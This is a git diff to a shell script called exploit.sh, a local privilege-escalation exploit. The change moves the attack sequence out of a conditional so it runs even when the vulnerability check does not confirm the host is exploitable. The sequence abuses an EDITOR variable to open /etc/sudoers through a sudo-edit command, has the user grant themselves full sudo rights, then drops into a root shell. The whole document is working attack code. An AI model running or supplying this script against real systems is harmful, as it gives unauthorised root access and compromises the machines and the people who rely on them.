diff --git a/exploit.sh b/exploit.sh index 078dd2e..8e9a472 100644 --- a/exploit.sh +++ b/exploit.sh @@ -31,11 +31,12 @@ if [ -z "$EXPLOITABLE" ]; then read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2 else echo "> BINGO! User exploitable" - echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" - echo "$USER ALL=(ALL:ALL) ALL" - read -n 1 -s -r -p "Press any key to continue..." - EDITOR="vim -- /etc/sudoers" $EXPLOITABLE - sudo su root - exit 0 fi +echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" +echo "$USER ALL=(ALL:ALL) ALL" +read -n 1 -s -r -p "Press any key to continue..." +EDITOR="vim -- /etc/sudoers" $EXPLOITABLE +sudo su root +exit 0 +